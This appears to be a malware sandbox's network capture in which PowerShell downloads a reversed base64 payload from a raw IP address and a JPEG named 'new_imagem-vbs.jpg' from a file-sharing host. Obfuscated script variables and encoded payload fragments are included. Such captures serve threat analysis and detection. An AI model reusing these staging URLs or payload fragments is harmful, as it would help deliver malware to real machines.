                                                            Dec 2, 2024 09:18:06.576868057 CET1236INData Raw: 00 3d 00 20 00 22 00 57 00 55 00 63 00 47 00 55 00 57 00 47 00 7a 00 69 00 61 00 4c 00 4c 00 74 00 50 00 42 00 22 00 0d 00 0a 00 4c 00 74 00 57 00 63 00 65 00 4f 00 4c 00 63 00 57 00 64 00 47 00 4f 00 69 00 7a 00 4e 00 20 00 3d 00 20 00 22 00 68
                                                            Data Ascii: = "WUcGUWGziaLLtPB"LtWceOLcWdGOizN = "hGWPTtWUGlPOqso"LbiLlPxczezknLu = "opPUPNJNlIPOWlG"cWGPUfchgeLLZNL = "alaLAWK
                                                            Dec 2, 2024 09:18:06.576879025 CET1236INData Raw: 00 55 00 69 00 47 00 6b 00 63 00 70 00 41 00 63 00 4b 00 69 00 68 00 57 00 65 00 69 00 20 00 3d 00 20 00 22 00 4e 00 5a 00 43 00 47 00 70 00 62 00 7a 00 73 00 66 00 4c 00 4a 00 62 00 57 00 7a 00 61 00 22 00 0d 00 0a 00 62 00 57 00 6f 00 62 00 57
                                                            Data Ascii: UiGkcpAcKihWei = "NZCGpbzsfLJbWza"bWobWpBZJuhWrzW = "dogiLKLaiWOcGee"TLobbskLAQWlPzS = "nBieWkWmPLCOijL"WkUSeGiaWnA
                                                            Dec 2, 2024 09:18:06.696420908 CET1236INData Raw: 00 41 00 6f 00 6d 00 49 00 62 00 4b 00 4c 00 42 00 50 00 22 00 0d 00 0a 00 4b 00 63 00 57 00 6d 00 47 00 7a 00 78 00 55 00 6b 00 4c 00 5a 00 75 00 74 00 71 00 4c 00 20 00 3d 00 20 00 22 00 75 00 4f 00 50 00 63 00 4e 00 6a 00 63 00 6d 00 4c 00 57
                                                            Data Ascii: AomIbKLBP"KcWmGzxUkLZutqL = "uOPcNjcmLWKhpcx"AWBaPzmWGCzeKfC = "UexLWiAoNoPWlWz"AohZczpqRLOLAiW = "PvsLohrmWngLKi


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449739172.245.123.12806592C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 2, 2024 09:18:32.599550962 CET79OUTGET /361/TELNERA.txt HTTP/1.1
                                                            Host: 172.245.123.12
                                                            Connection: Keep-Alive
                                                            Dec 2, 2024 09:18:33.752301931 CET1236INHTTP/1.1 200 OK
                                                            Date: Mon, 02 Dec 2024 16:18:33 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Mon, 02 Dec 2024 01:42:13 GMT
                                                            ETag: "5d2ac-6283fa86a38cf"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 381612
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/plain
                                                            Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                            Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            Dec 2, 2024 09:18:33.752322912 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw9o1WUZZwrem9Ihay0ZomQEtfwy8CpXHAOw2sfcYA8mF7RbMUVEugVfS+7voapW9MxR4X8xr36ofgq/vX2dC2uqwNbpBMTdELP34pvnqN9S3n4a6tklylFFe7k
                                                            Dec 2, 2024 09:18:33.752334118 CET448INData Raw: 36 6b 68 33 53 52 59 2b 64 42 38 4f 42 4c 68 47 72 56 6d 73 72 6c 59 50 58 6d 71 36 4b 74 64 79 59 6c 63 68 57 70 53 49 43 69 4a 35 79 59 59 4d 52 75 67 6b 36 7a 76 6d 49 5a 56 2f 51 69 30 49 76 69 6d 66 66 65 31 58 63 47 6b 47 37 6f 76 63 2f 37
                                                            Data Ascii: 6kh3SRY+dB8OBLhGrVmsrlYPXmq6KtdyYlchWpSICiJ5yYYMRugk6zvmIZV/Qi0Ivimffe1XcGkG7ovc/7JJiaSbdzn8M9QwHcuDRs+CHjmsOSiB3OWlG17EFxw6KsRaOU93EQem/PgSWnRF5Kvcc5qOnhfzkgdW9fF2ar6X3/OzZ73AiVUEGpD9VXecdeiD1+yJTd7Em+xks+qxlWoZgCByKHE3msMoOSmriQOUXCy+43THXVj
                                                            Dec 2, 2024 09:18:33.752460003 CET1236INData Raw: 46 69 71 30 45 71 5a 56 6e 67 50 35 33 36 44 6a 4e 67 63 4c 45 65 66 6e 49 6e 64 6b 6f 2f 73 65 64 63 44 49 50 50 7a 79 53 5a 2f 76 33 6a 50 30 68 75 6f 4e 4c 69 62 62 63 57 5a 49 51 78 6a 6e 46 64 54 69 4b 34 5a 4f 67 74 32 56 67 4e 56 70 54 31
                                                            Data Ascii: Fiq0EqZVngP536DjNgcLEefnIndko/sedcDIPPzySZ/v3jP0huoNLibbcWZIQxjnFdTiK4ZOgt2VgNVpT18K/6aps8PuaSlnKlfMXci5lobujLNOfLUv/6vkQvzTHMaGcXJNMvK4t3K1qmcc6hxf23mTZHJ2lzFo57OVoblME1eMy1nvjHtNno5wE8q1EBeEB8FjC3WRd+7UE6c4K7y4iL5cU2CvDpULsHH/0PngGjaW4LzSSp2
                                                            Dec 2, 2024 09:18:33.752473116 CET1236INData Raw: 44 49 4a 4f 69 63 6e 47 6b 62 6e 30 33 39 69 73 68 54 54 78 30 30 4b 31 79 52 45 79 72 69 66 7a 79 48 6b 47 54 39 37 67 6b 38 2b 48 39 45 68 36 51 73 7a 45 54 6f 73 62 49 54 59 72 70 4e 6d 72 30 4d 4d 61 79 74 65 59 58 32 31 76 33 46 2f 45 74 6a
                                                            Data Ascii: DIJOicnGkbn039ishTTx00K1yREyrifzyHkGT97gk8+H9Eh6QszETosbITYrpNmr0MMayteYX21v3F/EtjZ2aISU0aDDhI/UyeC+nlqQZPf74fgjIObxitooc430sHCy1KqLY7yqGGYiGzjlm2GD/pBLnHy3plqftvZS+ZlRy/juZZa3j8EBAxHjPg/7Vesevjh6adbLQRCC9322qq8xkBlTcvFzt0spgvBv75fBCpuKoIucKW3
                                                            Dec 2, 2024 09:18:33.752485037 CET1236INData Raw: 6c 46 43 56 63 6c 4c 31 46 36 32 34 52 47 4f 49 59 64 79 6d 5a 51 75 43 63 5a 50 4e 65 74 66 62 72 46 2f 4b 37 46 75 2f 6c 71 46 34 32 71 51 58 4f 34 46 43 4a 46 57 46 2b 54 47 4c 37 76 6f 4b 6e 68 7a 4e 6f 69 65 79 5a 31 44 51 65 4f 52 65 55 6e
                                                            Data Ascii: lFCVclL1F624RGOIYdymZQuCcZPNetfbrF/K7Fu/lqF42qQXO4FCJFWF+TGL7voKnhzNoieyZ1DQeOReUnjoJFlAYiB+57dbiBMuUm2l2yJwlHx0qAxBSGCIu4YdtJxtSSyuW2+ghFdZcIK+74v+luzkpfVirmtywlpjkpNQQKcIJeaFpdnSkDC0B1YbTfiw6p+Z9fNZBUmB7iKh8l2ZyiNaJ7XN82Jrj3OcMwLmxLLrD83UOxM
                                                            Dec 2, 2024 09:18:33.752496004 CET1236INData Raw: 65 77 4d 70 68 37 43 72 61 73 43 72 64 72 38 51 74 45 43 49 4a 43 51 37 31 47 48 47 49 38 54 4b 4b 66 4b 70 43 2b 37 57 50 75 54 50 72 47 44 51 50 2f 64 67 44 2b 6f 55 69 43 50 77 5a 6e 7a 58 49 55 61 6a 71 52 64 43 66 66 78 36 6a 2b 66 42 73 6c
                                                            Data Ascii: ewMph7CrasCrdr8QtECIJCQ71GHGI8TKKfKpC+7WPuTPrGDQP/dgD+oUiCPwZnzXIUajqRdCffx6j+fBsl+ChVs5LBuoyw8JC0+mKZinRUJg6PvDalVExr4KIMrQYHdAGvUDqDht5s1ih+t701I4WKvsb1RAd0OYalUtq6ANMEaejNSTDBd2PRQvwEPUPVamN9mK5hvZRVkNKM/FwvjI6syMTaqrowsIVZUC1Q3Gl9zDAYr1/uk
                                                            Dec 2, 2024 09:18:33.752722979 CET1236INData Raw: 58 73 33 49 37 70 42 42 78 53 68 79 33 61 78 32 2f 75 31 33 34 4d 46 72 73 4e 6f 56 78 7a 2b 79 53 53 64 34 71 48 67 64 53 46 6e 34 51 4b 77 30 7a 47 6a 61 66 6e 34 32 65 75 31 46 38 75 78 35 57 52 69 51 53 4a 58 54 75 6d 39 44 30 37 30 67 66 57
                                                            Data Ascii: Xs3I7pBBxShy3ax2/u134MFrsNoVxz+ySSd4qHgdSFn4QKw0zGjafn42eu1F8ux5WRiQSJXTum9D070gfWCg8xBEkpKj2A9gUsyaRBAp/Uv7Rn4INlbBX7znS4ECHRznnnIz4lwHPUkd4/zTpBuxKLfP81USedAYezfdmDc1zwIhs12gd3URLlZVoytsrE0iHRnUMVyeN5N6nZ7bwZ/JD7Kf586sm0yBfW+aZgz3dM7QIA5yCxf
                                                            Dec 2, 2024 09:18:33.752758980 CET1236INData Raw: 78 76 39 74 76 2f 68 71 46 58 66 34 41 45 62 44 6a 2b 2b 55 4e 55 6c 58 61 74 52 31 51 4b 2f 6d 70 33 69 35 73 6b 33 5a 46 65 2b 61 32 37 59 35 50 4d 58 4e 31 6a 4d 32 6a 35 53 50 73 47 2b 51 48 43 41 74 77 44 59 4f 58 6c 38 66 4a 2b 45 69 51 31
                                                            Data Ascii: xv9tv/hqFXf4AEbDj++UNUlXatR1QK/mp3i5sk3ZFe+a27Y5PMXN1jM2j5SPsG+QHCAtwDYOXl8fJ+EiQ1WR1L4/PGZhEp1OpgZHOOwjm+33vFv/FRmjbqm0COZESo3zOcowGaFpfd6EUAE7RzTX1Mf8ynGiAVx153Nw4DBtq8u7n+ODrQIHvaNCLHO8f5sDTD9pkEanqHNqvzJUKpIcsMBJhbcyj7cbxJxQCANtH69JyAhEfVD
                                                            Dec 2, 2024 09:18:33.752772093 CET1236INData Raw: 76 41 4a 76 4f 47 2b 67 31 39 37 4f 76 7a 6d 6d 4a 74 6b 2f 45 49 4f 41 45 77 38 32 58 59 51 5a 2b 35 44 6a 5a 45 74 41 6e 6f 38 35 33 65 31 6a 46 41 78 79 55 39 76 4d 41 7a 31 79 51 39 62 46 39 69 70 35 34 64 68 2b 58 5a 76 6b 56 76 50 33 4e 52
                                                            Data Ascii: vAJvOG+g197OvzmmJtk/EIOAEw82XYQZ+5DjZEtAno853e1jFAxyU9vMAz1yQ9bF9ip54dh+XZvkVvP3NRljaUYjhsKzT72AdP+YmVS+BbctyfwdsY8zaeOWJqp02uGOhkqrajSqKRHBY+d03wr/LDF+XvDl39k+k5tI0dcZElPO5H77Aa+o5/l91uv1feDuJAup8pki/N8ICR3GR5WMwUyTJWPwaQE5RVlzDBGykcWctY7fDT/
                                                            Dec 2, 2024 09:18:33.872441053 CET1236INData Raw: 6e 32 62 32 77 59 32 53 37 57 4b 36 4e 52 63 49 37 49 51 6f 7a 31 71 6d 4b 4c 59 7a 72 38 61 75 6d 32 35 32 57 44 53 32 78 4b 55 52 73 74 30 72 72 6f 53 5a 7a 66 70 4e 55 42 46 77 47 70 45 6b 71 4d 67 37 6d 75 50 48 38 72 62 4e 68 6d 4a 36 57 6b
                                                            Data Ascii: n2b2wY2S7WK6NRcI7IQoz1qmKLYzr8aum252WDS2xKURst0rroSZzfpNUBFwGpEkqMg7muPH8rbNhmJ6Wka8BCGNwLsJHJ1fo1aITFSVCkUiouytsjxfE9YR3f9Ma3CNSIdOixKcpueSG1SldwzWWXnSyHJNJZ7i1f7o36vxnVMDRcjw5Vcs82zdgZZdKye5SOedGza44caEYJuffkdiBdDYzO/CqMt4rrU5+z0MumCj+Vr4uVo


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449733142.215.209.774436592C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-02 08:18:13 UTC198OUTGET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1
                                                            Host: 1016.filemail.com
                                                            Connection: Keep-Alive
                                                            2024-12-02 08:18:14 UTC328INHTTP/1.1 200 OK
                                                            Content-Length: 2230233
                                                            Content-Type: image/jpeg
                                                            Last-Modified: Thu, 28 Nov 2024 11:44:46 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: 1c84779d9886011235a5e11f64ee8efb
                                                            X-Transfer-ID: qxdlxyadbikkvgc
                                                            Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                            Date: Mon, 02 Dec 2024 08:18:13 GMT
                                                            Connection: close
                                                            2024-12-02 08:18:14 UTC3708INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                            2024-12-02 08:18:14 UTC8192INData Raw: 13 2c 7a 22 ba 15 da df c4 54 d1 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33 4f a8 57 0c 87 81 ef f5 cf 61 0b 34 76 ad f8 41 ae 7b 60 29 e1 9e 14 9e 1b 03 44 8a 18 5e e0 cd d7 09 2a bb a5 d9 b5 27 d2 38 c7 84 88 c6 b7 ad fb 5e 55 d5 5d 48 2c 0f 5e 9c 60 26 fb 21 8a e4 53 67 8e 05 f5 18 ab 6b dd 26 69 4e a0 96 54 09 1a aa ed 53 c5 10 c0 e2 da e5 95 d9 96 33 b8 df 42 dc 0c ce 7d 3c c8 68 ee e3 93 5c 8c 0d 57 f0 ed 06 b3 42 16 48 4f de 1d bd 2a 83 75 12 78 1f 0e 2f 32 75 3f 66 5d 21 96 3d 2b ca ce 42 ee 5e 36 92 3a 83 df 8c 14 52 48 cd b0 3b 2b 86 e7 92 3f eb 8f e9 75 7a ed 38 2f 16 a1 57 aa 32 df 26 cf 4a 3c fd 70 32 bc 0e 0d 6e 8b c4 c3 b0 29 1c 7f f7 a3 77 55 cf af e9 7c 5a 49
                                                            Data Ascii: ,z"Ta~C!C3@8`mFfYk0?g3OWa4vA{`)D^*'8^U]H,^`&!Sgk&iNTS3B}<h\WBHO*ux/2u?f]!=+B^6:RH;+?uz8/W2&J<p2n)wU|ZI
                                                            2024-12-02 08:18:14 UTC8192INData Raw: 1b c6 f4 cf 3f 85 ce ba 77 da d1 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8 da 3f 21 88 46 07 7b 70 07 1d b1 0d 36 9d e2 58 b5 60 09 42 9f 52 8e 28 9e 07 ea 46 07 a9 56 b6 26 89 2b ec 78 e9 ed 92 5d 89 a2 68 66 46 97 c4 65 9b c4 8c 52 a8 89 69 86 c1 ef c7 5b 19 a3 a9 79 34 f0 86 8e 31 2b dd 6d 26 80 c0 30 00 59 20 57 b9 ca a9 de b6 18 b0 3d 3d b3 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5 5a a7 d3 24 a2 19 54 bc ad b8 10 7d 26 f3 36 46 68 51 95 26 32 2b 9a 65 45 71 c0 e9 76 a0
                                                            Data Ascii: ?wH?I?U/;I>A$Gsl76?!F{p6X`BR(FV&+x]hfFeRi[y41+m&0Y W==Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv
                                                            2024-12-02 08:18:14 UTC8192INData Raw: a6 b0 54 15 04 06 06 ef 3d 2e 97 ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07 88 ec f1 7d 17 df e2 4f 2a 64 94 2e a1 11 4e d2 08 f4 b5 d7 16 45 57 be 63 ea 9b 73 04 e4 8a ae 2b fa e0 66 3a ee 86 c1 b3 d0 8c 17 dd 9b 63 28 16 18 5d 7b 67 a9 7d 3f d9 b5 50 ac be 2a 03 73 e9 f2 c5 f0 3a 58 ca eb 7c 13 4e da 13 af f0 2d 44 ba 88 a2 03 ef 10 cd ff 00 7b 15 8f c5 b6 85 8f 88 f6 3e c7 03 c9 26 9b ca 05 49 e0 0b bf 7c e9 62 67 88 5a 31 65 1c 10 3b 7b 66 ab 03 e4 aa 3a 2f 99 7d 72 8f a5 6d cc 19 d3 72 ae e2 09 23 8e bf 5c 0c 54 0c d1 0d d6 1b bd f7 c9 88 38 9c 39 27 6a 8e 95 9a 6f a0 91 e6 55 52 80 32 ee 00 df 35 ce 28 90 32 44 fa 80 c9 4a 69 97 75 92 a7 8f a6 04 8d 42 ba b8 60 19 4b 28
                                                            Data Ascii: T=./ER;UM'IlWLPOj=}O*d.NEWcs+f:c(]{g}?P*s:X|N-D{>&I|bgZ1e;{f:/}rmr#\T89'joUR25(2DJiuB`K(
                                                            2024-12-02 08:18:14 UTC8192INData Raw: 96 7f 02 68 c3 ed 72 8d b0 70 45 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76 90 6b f2 ca 58 36 05 9f 7a c6 fe d5 7f d8 b5 71 49 a6 78 ff 00 7a a4 3a b2 d5 95 24 5f f6 f7 eb 98 71 78 ac 61 4d a3 2b 8f c4 07 f4 c0 da 5f 0c d6 16 8c 08 f6 87 1b 95 98 8a ae dd 31 f3 f6 69 59 43 99 cf 99 7d 42 8d a3 df 83 d7 07 e1 da 77 d4 e9 5f 53 2e 9d 67 59 11 4a 9d f7 b4 57 37 ec 40 24 fd 31 99 3c 5f 4f e0 9a 78 e0 d6 c8 5b 50 88 14 a2 7a 88 eb cb 0f e1 1d 39 c0 4a 7f 08 5d 1b 34 93 ce 86 28 dc 29 00 10 5b 8b ae 7d fe 18 b6 9b c3 9f 5e 9a 9d 4a 6d 8b 4e 84 aa 96 70 3e 9c 8e 78 cb 45 a5 d7 f8 ba ae a4 c2 eb 1a 90 11 59 7c bd ca 6c fa 41 e4 8f 8e 69 3f 86 cc 9e 01 26 95 c8 89 49 67 17 27 e1 02 8e
                                                            Data Ascii: hrpEaU/piu4d?!WfytUvkX6zqIxz:$_qxaM+_1iYC}Bw_S.gYJW7@$1<_Ox[Pz9J]4()[}^JmNp>xEY|lAi?&Ig'
                                                            2024-12-02 08:18:14 UTC8192INData Raw: 9c 61 a9 2d 87 73 db 19 1a b4 68 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d 58 cc 69 be 06 f2 de 81 04 0f cf 11 8b 46 fe 6d 93 5b 79 2d ef 81 a5 f6 71 1a 1f 1f d1 2c 8b e9 3b bf f2 b6 7b 0d 7a c2 61 91 19 f6 a1 16 c5 78 bc f2 fe 19 a9 8e 0f 12 86 66 f5 05 0c 47 d5 48 fe b8 ef 89 78 82 6a 0e c8 d7 68 61 ef d7 03 2e 17 d6 24 ad 1e 92 56 10 5d ed eb 79 bb a4 90 e9 e0 65 d4 10 c4 7a ac 62 30 4f a7 d2 45 60 1d c4 75 cb 9d 6c 5a 85 01 68 0e 87 8e 4e 06 79 95 df ed 67 9d 1a f4 e0 9f f8 30 7e 2d 3b 3e aa 75 2d 41 a0 5b 00 5d d3 dd 65 d6 45 4f b5 22 98 14 ab 3f f2 11 fd 71 7f 16 dc 75 92 b0 1b 6e 1b 00 71 63 76 06 87 8c 05 fb 94 70 84 11 c4 b2 52 92 a7 9f 4b 61 b4 33 28 f0 b8 5a 45 5a
                                                            Data Ascii: a-shCaY8&ctd7*1SR==XiFm[y-q,;{zaxfGHxjha.$V]yezb0OE`ulZhNyg0~-;>u-A[]eEO"?qunqcvpRKa3(ZEZ
                                                            2024-12-02 08:18:14 UTC8192INData Raw: 34 1a 98 51 59 2b 6e e6 20 f3 f1 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee 62 55 77 11 74 3a dd 7d 33 77 53 17 8c 3c 12 39 9b 4c bb 48 65 11 b1 05 76 8e 40 f4 f5 26 b3 cb 34 f3 12 0b 3b 5a b9 63 b8 72 59 b8 63 fa 60 13 50 90 23 40 c8 1f 64 8b b8 ef a1 43 73 0a e9 f0 c7 a0 4d 34 9a a8 24 57 68 43 cc c5 d8 90 ca 08 a2 a0 71 fe 6a cc b9 67 69 84 4b 56 51 4a dd f5 f5 16 fc b9 c3 27 88 49 1e 96 18 10 22 94 76 70 db 41 3c 80 39 e3 e1 81 ec 25 89 51 88 25 9a c5 9e 7e 3f 0e d8 34 28 cf b1 08 06 ae 8e 60 cf a4 f1 2d 44 c7 51 26 a2 17 62 80 1e eb 5e d5 55 91 1e 87 5e ae 5a 3d 6c 6a d5 43 6c 8c bc 7c 28 60 7a 38 f4 a1 98 ab 50 e0 ff 00 2c 34 2a 11 42 ec b2
                                                            Data Ascii: 4QY+n IjDQH,,h2yky3SLbUwt:}3wS<9LHev@&4;ZcrYc`P#@dCsM4$WhCqjgiKVQJ'I"vpA<9%Q%~?4(`-DQ&b^U^Z=ljCl|(`z8P,4*B
                                                            2024-12-02 08:18:14 UTC8192INData Raw: 8d 96 32 14 4e aa e1 41 65 5b 52 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4 79 30 ed 54 57 f3 55 94 d8 ed 5d 6e fd f3 e7 9e 35 2b a0 11 59 a2 4f 4e fd 33 e8 5e 27 a6 33 69 c1 44 11 88 a3 67 63 cd 80 aa 68 7b 77 39 f3 8f 15 7f 32 73 62 88 ed f9 60 0f 4b aa 68 b4 b2 69 e4 41 24 4e 37 15 2c 46 d3 c1 bb 1f 2c e8 f5 12 69 22 91 12 32 93 b7 57 37 61 6a f8 07 a6 2a 80 b1 f5 38 8f 8e 2e e8 fe 58 de aa 36 32 09 02 12 bb 23 1b d8 1a bd 8b c7 23 01 ad 0e bd 34 7a 59 10 ab 19 0b 31 0e 2a 88 2b 54 7b f5 e7 15 82 59 20 25 e3 62 ac c2 8d 7b 5d e5 5f 4d 22 2a 99 11 95 5b d4 a4 ad 6e cb 32 88 c2 72 ad b8 5d 2f ce bf a6 01 d2 67 5d 5c 33 4c ec fb 1d 5b fe 10 7a 64
                                                            Data Ascii: 2NAe[RTU7$xUI:v9.cO|x0!0(oy0TWU]n5+YON3^'3iDgch{w92sb`KhiA$N7,F,i"2W7aj*8.X62##4zY1*+T{Y %b{]_M"*[n2r]/g]\3L[zd
                                                            2024-12-02 08:18:14 UTC8192INData Raw: 13 ca 42 8c 41 7b be 40 ca a2 7a 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7 e0 e6 d1 de aa ca 52 ef a1 f6 c5 bc 31 37 6b 34 b6 3f c4 2f fe 1c df 68 d2 e8 d1 c0 c5 8b 4e d4 c5 c5 83 db 10 13 3b 4e ea 84 2a a9 f6 eb 9e 8d c0 5b 00 0e 73 3d b4 a9 6c c1 28 9e b8 1e 76 75 0d e2 e5 b6 02 09 5a 07 e4 32 ba dd 2e c9 03 06 e5 95 8f ab b5 01 8e 6a 60 d9 e2 d4 05 fe 1f e4 32 de 21 18 06 2d e2 ed 5a 8f c6 b8 c0 46 70 cd e1 f1 a2 90 17 68 35 c7 aa ab af e7 8c 78 06 9d 5d e5 76 65 34 bb 76 b7 43 95 78 83 78 7b 12 a3 d2 c0 29 06 b9 a5 07 fa e1 7c 28 c3 19 65 76 2b 29 61 b6 81 37 7c 7f 5c 04 bc 41 25 87 5d 16 f4 8c 32 a8 2a b1 72 28 31 f7 cd 3d 64 03 69 76 92 71
                                                            Data Ascii: BA{@z(4EUPc!I*`c`_4L5/hR17k4?/hN;N*[s=l(vuZ2.j`2!-ZFph5x]ve4vCxx{)|(ev+)a7|\A%]2*r(1=divq
